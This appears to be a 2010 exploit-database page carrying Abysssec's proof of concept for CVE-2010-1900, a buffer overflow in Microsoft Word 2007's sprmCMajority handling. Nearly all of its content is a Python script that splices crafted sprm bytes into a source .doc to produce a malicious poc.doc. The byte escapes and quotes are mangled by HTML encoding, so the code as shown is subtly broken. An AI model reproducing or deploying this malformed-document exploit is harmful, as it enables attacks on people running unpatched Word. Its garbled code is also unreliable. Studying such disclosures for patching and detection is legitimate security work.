[dos / poc] - Microsoft Office Word 2007 sprmCMajority Buffe

Posted on 10 September 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Microsoft Office Word 2007 sprmCMajority Buffer Overflow | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Exploit category: dos / poc | Exploit author: Abysssec' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>========================================================
Microsoft Office Word 2007 sprmCMajority Buffer Overflow
========================================================

  Title               :  Microsoft Office Word sprmCMajority buffer overflow
  Version             :  Word 2007 SP 2
  Analysis           :  http://www.abysssec.com
  Vendor              :  http://www.microsoft.com
  Impact              :  Critical
  Contact             :  shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter             :  @abysssec
  CVE                 :  CVE-2010-1900
 
&#039;&#039;&#039;
 
import sys
 
def main():
    
    try:
        fdR = open(&#039;src.doc&#039;, &#039;rb+&#039;)
        strTotal = fdR.read()
        str1 = strTotal[:4082]
        str2 = strTotal[4088:]
         
        sprmCMajority = &quot;x47xCAxFF&quot;    # sprmCMajority 
        sprmPAnld80 = &quot;x3ExC6xFF&quot;    # sprmPAnld80
                 
        fdW= open(&#039;poc.doc&#039;, &#039;wb+&#039;)
        fdW.write(str1)
        fdW.write(sprmCMajority)
        fdW.write(sprmPAnld80)             
        fdW.write(str2)
         
        fdW.close()
        fdR.close()
        print &#039;[-] Word file generated&#039;
    except IOError:
        print &#039;[*] Error : An IO error has occurred&#039;
        print &#039;[-] Exiting ...&#039;
        sys.exit(-1)
                 
if __name__ == &#039;__main__&#039;:
    main()


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-10]</pre></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20